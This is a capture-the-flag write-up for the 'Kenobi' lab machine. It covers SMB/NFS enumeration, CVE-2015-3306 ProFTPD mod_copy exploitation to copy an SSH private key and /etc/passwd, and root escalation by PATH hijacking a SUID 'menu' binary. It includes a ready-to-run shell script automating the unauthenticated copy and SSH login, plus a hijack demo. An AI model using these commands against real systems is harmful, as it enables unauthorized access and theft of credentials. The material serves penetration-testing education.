
[Linux] Kenobi

Reconnaissance

sudo nmap 10.10.67.152
sudo nmap -A -p 21,22,80,111,139,445,2049 10.10.67.152

Enumeration

HTTP

We don't find anything interesting on the website, including the two extra paths we checked:

http://10.10.67.152/
http://10.10.67.152/robots.txt
http://10.10.67.152/admin.html

SMB

We can list SMB shares and users with nmap, then browse and recursively download the anonymous share:

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.67.152
smbclient //10.10.67.152/anonymous
smbget -R smb://10.10.67.152/anonymous

In log.txt from the anonymous share, we see that an SSH RSA key pair was generated for the kenobi user, which tells us where a private key should live: /home/kenobi/.ssh/id_rsa.

Rpcbind

rpcbind (port 111) confirms that an NFS server is running (port 2049 was open too), and listing its exports shows that /var is exported.

To read the export we create a mount point and mount /var on it:

mkdir /mnt/kenobiNFS
mount 10.10.67.152:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS

Nothing of interest yet, but the mount matters later: any file that ends up under /var/tmp on the target becomes readable from our side through /mnt/kenobiNFS/tmp.

Proftpd

The ProFTPD version reported by nmap corresponds to a release with known vulnerabilities.

CVE-2015-3306 is a flaw in ProFTPD's mod_copy module: the SITE CPFR (copy from) and SITE CPTO (copy to) commands are accepted without authentication, so an anonymous client can copy any file the ProFTPD process can read to any location it can write. Here that process can read kenobi's home directory, and /var/tmp is writable and lies inside the NFS export.

Exploitation

The exploitation process will be as follows:

  • Connect to ProFTPD with netcat. No login is needed, because the vulnerable mod_copy commands are accepted before authentication.

nc 10.10.67.152 21

  • Copy kenobi's private key and /etc/passwd into /var/tmp, which lies inside the /var export we mounted:

SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

SITE CPFR /etc/passwd
SITE CPTO /var/tmp/passwd

  • Read the files through the mount point (/mnt/kenobiNFS/tmp). Since the mount is read-only, copy the key to local disk, set its permissions to 600 (ssh refuses a key other users can read) and use it to log in as kenobi over SSH.

It worked! SSH with the stolen key gives us a shell as kenobi, and with it the user flag.
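The same procedure as a script, so it can be re-run without typing into nc. This is an added example, not part of the original writeup: the target address, user name and paths are the ones used above; the reply texts in the constructed transcript are illustrative of ProFTPD's 350 (source accepted) and 250 (copy done) codes; the netcat and ssh steps are only invoked against a live target.

```shell
#!/bin/sh
# Added example: drive CVE-2015-3306 (ProFTPD mod_copy) non-interactively.
# Constructed for this writeup; nothing here comes from the room itself.

# Emit the mod_copy command sequence. FTP lines end in CRLF, and no USER/PASS
# is sent: the bug is precisely that SITE CPFR/CPTO work before authentication.
modcopy_commands() {
    printf 'SITE CPFR %s\r\nSITE CPTO %s\r\nQUIT\r\n' "$1" "$2"
}

# Feed the sequence to the target's control port and return the transcript.
# Arguments: host port source destination
modcopy_run() {
    modcopy_commands "$3" "$4" | nc -w 5 "$1" "$2"
}

# A transcript on stdin means success only if CPFR answered 350 and CPTO
# answered 250; a 550 (unreadable source, unwritable destination) is a failure.
modcopy_succeeded() {
    transcript=$(tr -d '\r')
    printf '%s\n' "$transcript" | grep -q '^350 ' &&
    printf '%s\n' "$transcript" | grep -q '^250 '
}

# Copy kenobi's private key and /etc/passwd into /var/tmp, which sits inside
# the /var export we mounted at /mnt/kenobiNFS.
modcopy_loot() {
    for pair in '/home/kenobi/.ssh/id_rsa /var/tmp/id_rsa' '/etc/passwd /var/tmp/passwd'; do
        set -- $pair
        if ! modcopy_run 10.10.67.152 21 "$1" "$2" | modcopy_succeeded; then
            echo "copy of $1 failed" >&2
            return 1
        fi
    done
}

# Pull the key out of the read-only mount, fix its permissions and log in.
use_key() {
    cp /mnt/kenobiNFS/tmp/id_rsa ./id_rsa
    chmod 600 ./id_rsa
    ssh -i ./id_rsa kenobi@10.10.67.152
}

# Constructed transcript of a successful exchange, for checking the
# response parser without a target (wording is illustrative).
SAMPLE_OK='220 ProFTPD Server ready.
350 File or directory exists, ready for destination name
250 Copy successful
221 Goodbye.'

# Usage against the live target:  modcopy_loot && use_key
```

The response check is the part worth keeping: a copy that silently fails (for instance because the source is not readable by the ProFTPD user) still returns a transcript, and only the 350/250 pair tells you the file actually landed in /var/tmp.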

Escalation

For privilege escalation, we look for programs with the SUID bit set:

find / -perm -u=s -type f 2>/dev/null

One entry is not a standard SUID binary on a Unix system: /usr/bin/menu.

We can pull the binary back to our machine to analyze it with Ghidra. Note that python3's http.server listens on port 8000 by default, so the download must go to that port rather than to the Apache server on port 80.

# Targeted machine
cp /usr/bin/menu .
python3 -m http.server

# Attacker machine
wget http://10.10.67.152:8000/menu

Ghidra decompiles the binary for us, but running strings on it is already enough to see which commands it executes.

strings /usr/bin/menu

The commands are invoked by bare name rather than by absolute path, so the shell that the SUID program spawns resolves them through our PATH. We can therefore create our own curl, put its directory first in PATH, and let menu run it with root privileges.

cd /tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH

We then run /usr/bin/menu and choose the option that calls curl; it executes our /tmp/curl as root and drops us into a root shell, where we read the root flag.
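Why the trick works, demonstrated without root. This is an added example, not from the original writeup: it reproduces the PATH lookup that a system()-style call performs, using a fake curl that only prints its uid (on the target it is /bin/sh, which the SUID program then runs as root). The exact command menu runs is assumed here to be curl -I localhost; the point is only that curl is named without a path.

```shell
#!/bin/sh
# Added example: PATH hijacking against a program that calls "curl" by bare
# name. Runs unprivileged in a temporary directory; nothing here touches the
# target.

# Drop a fake curl into a fresh directory and print the directory's path.
# On the real target the writeup writes "/bin/sh" into /tmp/curl instead.
make_hijack_dir() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\necho "hijacked curl running as uid $(id -u)"\n' > "$dir/curl"
    chmod 755 "$dir/curl"
    printf '%s\n' "$dir"
}

# Which executable does the shell pick for a bare "curl" under this PATH?
# (The same lookup /bin/sh does when system("curl -I localhost") runs.)
resolve_curl() {
    (PATH="$1"; command -v curl)
}

# Run menu's command the way system() would, with the hijack directory first
# in PATH, and return whatever "curl" printed. The command string is an
# assumption about menu's status-check option.
simulate_menu() {
    PATH="$1:$PATH" sh -c 'curl -I localhost' 2>&1
}

# Demo: with the hijack directory first in PATH, our curl wins over the real
# one even if a genuine curl is installed later in PATH.
dir=$(make_hijack_dir)
resolve_curl "$dir:$PATH"
simulate_menu "$dir"
```

The fix on the defender's side follows directly: a SUID program must call helpers by absolute path (or reset PATH to a known value before calling system()), and ideally should not shell out at all.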

Remediation
